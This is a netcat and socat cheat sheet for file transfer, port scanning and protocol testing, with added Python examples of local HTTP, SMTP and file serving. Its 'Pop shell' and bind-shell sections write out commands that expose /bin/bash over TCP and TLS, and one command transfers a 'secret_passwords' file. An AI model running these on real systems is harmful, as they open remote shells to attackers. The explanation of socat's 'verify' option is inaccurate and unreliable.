File transfer (Transferring files)

HTTP server

```bash
# serve the current directory over HTTP on port 8080
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
```

FTP server

```bash
# pyftpdlib: -p = listening port, -w = allow anonymous write access
python -m pyftpdlib -p 2121 -w
python3 -m pyftpdlib -p 2121 -w
```
NC (netcat)

Connecting to a server

TCP server

```bash
# nc <domain_name> <PORT>
nc host.example.com 80
# nc [-param] <IP> <PORT>
nc -nv 127.0.0.1 80
```

-n: Skip DNS name resolution
-v: Add some verbosity

```bash
nc -p 31337 -w 5 host.example.com 80
```

-p: Specify source port 31337
-w: Wait (time out) after 5 seconds

UDP server

```bash
nc -u host.example.com 53
```
As a server

TCP server

```bash
nc -nlvp 4443
```

-l: Create a listener
-p: Specify the listening port number

Pop shell

```bash
# Linux
nc -nlvp 4444 -e /bin/bash
# Mac (& connect twice)
nc -lp 4444 | /bin/bash | nc -lp 4444
netcat -nlvp 4444 -e /bin/bash
```

Talk to an HTTP server

```bash
printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80
```
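The two pieces above (`python3 -m http.server` on one side, `printf "GET / HTTP/1.0\r\n\r\n" | nc` on the other) together make a complete file transfer. The following added example, which is not part of the original notes, performs exactly that exchange with Python sockets: it starts the stdlib HTTP file server in-process on an ephemeral port, sends the same raw HTTP/1.0 bytes that the `printf | nc` line sends, and parses the status line, headers and body from the reply. The served directory, file name and content are constructed here.

```python
"""Added example (not from the cheat sheet): the raw HTTP/1.0 exchange behind
`printf "GET / HTTP/1.0\\r\\n\\r\\n" | nc host 80`, run against a local
`http.server` started in-process so it works offline."""
import functools
import http.server
import socket
import socketserver
import tempfile
import threading
from pathlib import Path


def start_http_server(directory: str) -> tuple[socketserver.TCPServer, int]:
    """Start the stdlib file server (what `python3 -m http.server` runs) on an
    ephemeral port in a background thread; return the server and its port."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=directory)
    srv = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def raw_http_get(host: str, port: int, path: str = "/") -> tuple[int, dict, bytes]:
    """Send a bare HTTP/1.0 request (the exact bytes the printf|nc line sends)
    and parse status code, headers and body from the reply."""
    req = f"GET {path} HTTP/1.0\r\n\r\n".encode("ascii")
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(req)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:  # HTTP/1.0: the server closes the socket after the response
                break
            chunks.append(data)
    raw = b"".join(chunks)
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])  # "HTTP/1.0 200 OK" -> 200
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def demo() -> tuple[int, int, bytes]:
    """Serve a constructed directory, then fetch one existing and one missing
    file; return (status for hello.txt, status for nope.txt, body of hello.txt)."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "hello.txt").write_bytes(b"transfer ok\n")  # constructed sample file
        srv, port = start_http_server(d)
        try:
            ok_status, _headers, ok_body = raw_http_get("127.0.0.1", port, "/hello.txt")
            missing_status, _, _ = raw_http_get("127.0.0.1", port, "/nope.txt")
        finally:
            srv.shutdown()
            srv.server_close()
    return ok_status, missing_status, ok_body


if __name__ == "__main__":
    print(demo())
```

`raw_http_get` reads until the peer closes the connection, which is why the request is HTTP/1.0 rather than 1.1: with 1.0 the server closes after one response, so a plain `nc` (or this loop) knows the transfer is complete without parsing `Content-Length`.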
Talk to an SMTP server

```bash
nc [-C] localhost 25 << EOF
HELO host.example.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Body of e-mail.
.
QUIT
EOF
```
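The heredoc above only works because SMTP is a line-oriented request/reply protocol: every command gets a numeric reply, except that the lines between `DATA` and the lone `.` are the message body and get no reply until the dot. The `-C` flag makes netcat send CRLF line endings, which is what the protocol expects. The following added example, not part of the original notes, writes out both sides of that conversation: a minimal in-process SMTP responder (constructed here, not a real MTA) plays the server, and the client sends the same command script with CRLF endings and collects the reply codes. The mail addresses are placeholders.

```python
"""Added example (not from the cheat sheet): the SMTP dialog driven by
`nc -C localhost 25 << EOF ... EOF`, with a toy server so it runs offline."""
import socket
import threading

CRLF = b"\r\n"

# Constructed session, same commands as the heredoc (addresses are placeholders)
SESSION = [
    "HELO host.example.com",
    "MAIL FROM:<sender@example.test>",
    "RCPT TO:<rcpt@example.test>",
    "DATA",
    "Body of e-mail.",
    ".",
    "QUIT",
]


def smtp_responder(listener: socket.socket, record: dict) -> None:
    """Toy SMTP server: one session, just enough of the protocol for the page's
    dialog. It stores the envelope and body it receives in `record`."""
    conn, _ = listener.accept()
    with conn:
        f = conn.makefile("rb")
        conn.sendall(b"220 mail.example.test ESMTP ready" + CRLF)
        in_data, body = False, []
        for raw in f:
            line = raw.rstrip(b"\r\n").decode("ascii", "replace")
            if in_data:
                if line == ".":  # lone dot terminates the message body
                    in_data = False
                    record["body"] = "\n".join(body)
                    conn.sendall(b"250 OK queued" + CRLF)
                else:  # undo dot-stuffing on body lines that start with "."
                    body.append(line[1:] if line.startswith("..") else line)
                continue
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                record["helo"] = arg
                conn.sendall(b"250 mail.example.test" + CRLF)
            elif verb in ("MAIL", "RCPT"):  # "MAIL FROM:<x>" / "RCPT TO:<x>"
                _, _, addr = arg.partition(":")
                if verb == "MAIL":
                    record["from"] = addr.strip()
                else:
                    record.setdefault("to", []).append(addr.strip())
                conn.sendall(b"250 OK" + CRLF)
            elif verb == "DATA":
                in_data = True
                conn.sendall(b"354 End data with <CR><LF>.<CR><LF>" + CRLF)
            elif verb == "QUIT":
                conn.sendall(b"221 Bye" + CRLF)
                break
            else:
                conn.sendall(b"500 Command not recognized" + CRLF)


def send_session(port: int, commands: list[str]) -> list[int]:
    """Client side: send each line with CRLF (what nc -C does) and return the
    reply code for the greeting and for every command that gets one."""
    codes = []
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        f = s.makefile("rb")
        codes.append(int(f.readline()[:3]))  # 220 greeting arrives first
        in_data = False
        for cmd in commands:
            s.sendall(cmd.encode("ascii") + CRLF)
            if in_data:  # body lines get no reply; only the "." does
                if cmd == ".":
                    in_data = False
                    codes.append(int(f.readline()[:3]))
                continue
            code = int(f.readline()[:3])
            codes.append(code)
            if cmd.upper() == "DATA" and code == 354:
                in_data = True
    return codes


def demo() -> tuple[list[int], dict]:
    """Run the page's session against the toy server; return (reply codes, what
    the server recorded)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    record: dict = {}
    t = threading.Thread(target=smtp_responder, args=(listener, record), daemon=True)
    t.start()
    codes = send_session(port, SESSION)
    t.join(5)
    listener.close()
    return codes, record


if __name__ == "__main__":
    print(demo())
```

The reply sequence for the page's script is `220, 250, 250, 250, 354, 250, 221`; the responder's `record` shows what a receiving server actually keeps from the envelope (the `HELO` name and `MAIL FROM` are client-supplied strings, which is why mail logs alone never authenticate a sender).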
Port scanning

```bash
# Continuous range
nc -zv host.example.com 20-30
# Specific ports
nc -zv host.example.com 80 20 22
```

Test which servers are running

```bash
echo "QUIT" | nc host.example.com 20-30
```

Create and listen on a UNIX-domain stream socket

```bash
nc -lU /var/tmp/dsocket
# Connects to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080.
nc -x10.2.3.4:8080 -Xconnect host.example.com 42
```
SOCAT

Direct connection

```bash
# socat TCP4:<domain/IP>:<PORT> [Output]
socat TCP4:server.maojui.me:4444 STDOUT
```

Receive content and write it to a file

```bash
# socat TCP4:<domain/IP>:<PORT> file:<write_response_to>,create
socat TCP4:server.maojui.me:4444 file:received_secret_passwords.txt,create
```

Socat encrypted bind shells

```bash
socat - OPENSSL:10.11.0.4:443,verify=0
```
As a server

```bash
# tcp-listen:<PORT>,<param>,... : wait for a connection
socat TCP4-LISTEN:443 STDOUT
socat -d -d TCP4-LISTEN:443 STDOUT
```

-d: For more connection detail.
-d -d: Show fatal, error, warning, and notice messages.

Share the file

```bash
socat TCP4-LISTEN:443,fork,reuseaddr file:secret_passwords.txt
```
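In that command `fork` makes socat handle each incoming connection separately so several clients can fetch the file at once, and `reuseaddr` sets SO_REUSEADDR so the listener can be restarted while old connections sit in TIME_WAIT. The following added example, which is not socat's code or the cheat sheet's, reproduces that behaviour with the Python stdlib: a threaded listener that streams one file to every client, a receiver that reads until EOF, and a SHA-256 check that each client got the same bytes the sender holds, which is the check worth doing after any ad-hoc transfer. The file content and client count are constructed.

```python
"""Added example (not from the cheat sheet): a stdlib equivalent of
`socat TCP4-LISTEN:<port>,fork,reuseaddr file:<file>` plus a receiver that
verifies the transfer with SHA-256. Runs entirely on 127.0.0.1."""
import hashlib
import socket
import socketserver
import tempfile
import threading
from pathlib import Path


class FileHandler(socketserver.StreamRequestHandler):
    def handle(self) -> None:
        # Stream the whole file, then let the connection close; the client
        # reads until EOF, just like socat's file: address on the listen side.
        with open(self.server.path, "rb") as fh:
            while chunk := fh.read(65536):
                self.wfile.write(chunk)


class FileServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True  # `reuseaddr`: SO_REUSEADDR on the listening socket
    daemon_threads = True       # `fork`: every connection served independently

    def __init__(self, addr: tuple[str, int], path: Path):
        self.path = path
        super().__init__(addr, FileHandler)


def receive(host: str, port: int) -> bytes:
    """Client side: connect, read until the server closes, return the bytes."""
    with socket.create_connection((host, port), timeout=5) as s:
        buf = bytearray()
        while data := s.recv(65536):
            buf += data
    return bytes(buf)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def demo(n_clients: int = 3) -> tuple[bool, str]:
    """Serve a constructed file to several concurrent clients. Return whether
    every client's bytes match the sender-side digest, and that digest."""
    content = b"".join(f"line {i}: constructed sample content\n".encode() for i in range(2000))
    with tempfile.TemporaryDirectory() as d:
        path = Path(d, "shared.bin")
        path.write_bytes(content)
        srv = FileServer(("127.0.0.1", 0), path)
        port = srv.server_address[1]
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        results: list = [None] * n_clients

        def worker(i: int) -> None:
            results[i] = receive("127.0.0.1", port)

        threads = [threading.Thread(target=worker, args=(i,)) for i in range(n_clients)]
        for t in threads:
            t.start()
        for t in threads:
            t.join(10)
        srv.shutdown()
        srv.server_close()
    expected = sha256(content)
    return all(r is not None and sha256(r) == expected for r in results), expected


if __name__ == "__main__":
    print(demo())
```

Without the threading server (the `fork` option), a second client would queue behind the first until its transfer finished; without `allow_reuse_address`, restarting the listener on the same port right after a transfer can fail with "Address already in use".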
Pop shell

```bash
# Hand a bash shell to the service listening on 127.0.0.1:443
socat TCP4:127.0.0.1:443 EXEC:/bin/bash
```

Bind shell

```bash
# Hand a bash shell to anyone who connects on port 443
socat -d -d TCP4-LISTEN:443 EXEC:/bin/bash
# Hand a bash shell to anyone who connects on port 443 and presents a certificate
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=1,fork EXEC:/bin/bash
```

Execute on TCP connect

```bash
# socat -v tcp-listen:10000,fork,reuseaddr,su=ctf EXEC:"$COMMAND"$EXTRA
socat tcp-listen:4123,fork,reuseaddr,su=ctf EXEC:"python exp.py"
```

su: user whose permissions the command runs with

Encrypted shell

```bash
# cert=<cert.pem>
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
```

cert: certificate
verify: whether the SSL connection is enabled, 0=disable, 1=enable